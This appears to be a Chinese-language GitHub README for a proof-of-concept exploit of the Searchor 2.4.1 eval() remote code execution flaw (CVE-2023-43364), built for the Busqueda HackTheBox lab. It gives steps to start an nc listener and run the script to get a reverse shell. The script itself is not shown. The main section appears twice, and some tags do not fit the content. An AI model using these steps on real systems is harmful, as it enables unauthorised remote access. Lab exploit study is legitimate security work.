fuzzyb34r/Searchor-2.4.1-RCE-Exploit-PoC
GitHub: fuzzyb34r/Searchor-2.4.1-RCE-Exploit-PoC
Searchor 2.4.1 远程代码执行漏洞的概念验证利用脚本。
Stars: 0 | Forks: 0
# Searchor-2.4.1-RCE-Exploit-PoC
Searchor<=2.4.1 远程代码执行漏洞的利用代码
# 简要说明
2023 年,在 Searchor(一款快速且易于使用的搜索软件)中发现了一个远程代码执行漏洞。
该漏洞的成因是使用了 Python eval() 语句,该语句可被用户控制且未包含任何输入验证。
以下是存在漏洞的代码片段:
该漏洞利用程序主要针对 Busqueda HTB 实验环境开发并进行了测试。
# PoC
克隆代码库,更改目录
```
git clone https://github.com/fuzzyb34r/Searchor-2.4.1-RCE-Exploit-PoC ; cd Searchor-2.4.1-RCE-Exploit-PoC
```
将脚本标记为可执行
```
chmod +x poc.sh
```
在首选端口启动监听器
```
nc -lvnp 1234
listening on [any] 1234 ...
```
运行 PoC
```
./poc.sh
Enter Attacker IP: 10.10.10.15
Enter Port of Listener: 1234
Enter Target Domain (e.g. example.com, searcher.htb): searcher.htb
[+] Sending Payload & Popping Shell!
```
# 参考
https://github.com/ArjunSharda/Searchor/commit/29d5b1f28d29d6a282a5e860d456fab2df24a16b
https://www.miggo.io/vulnerability-database/cve/CVE-2023-43364
https://security.snyk.io/vuln/SNYK-PYTHON-SEARCHOR-3166303
https://github.com/advisories/GHSA-66m2-493m-crh2
该漏洞利用程序主要针对 Busqueda HTB 实验环境开发并进行了测试。
# PoC
克隆代码库,更改目录
```
git clone https://github.com/fuzzyb34r/Searchor-2.4.1-RCE-Exploit-PoC ; cd Searchor-2.4.1-RCE-Exploit-PoC
```
将脚本标记为可执行
```
chmod +x poc.sh
```
在首选端口启动监听器
```
nc -lvnp 1234
listening on [any] 1234 ...
```
运行 PoC
```
./poc.sh
Enter Attacker IP: 10.10.10.15
Enter Port of Listener: 1234
Enter Target Domain (e.g. example.com, searcher.htb): searcher.htb
[+] Sending Payload & Popping Shell!
```
# 参考
https://github.com/ArjunSharda/Searchor/commit/29d5b1f28d29d6a282a5e860d456fab2df24a16bhttps://www.miggo.io/vulnerability-database/cve/CVE-2023-43364
https://security.snyk.io/vuln/SNYK-PYTHON-SEARCHOR-3166303
https://github.com/advisories/GHSA-66m2-493m-crh2
标签:CISA项目, CVE-2023-43364, eval注入, HackTheBox, Maven, PoC, Python, RCE, Searchor, Web安全, 代码安全, 反弹Shell, 命令执行, 应用安全, 无后门, 暴力破解, 漏洞枚举, 漏洞验证, 编程工具, 网络安全, 蓝队分析, 输入验证缺失, 远程代码执行, 逆向工具, 隐私保护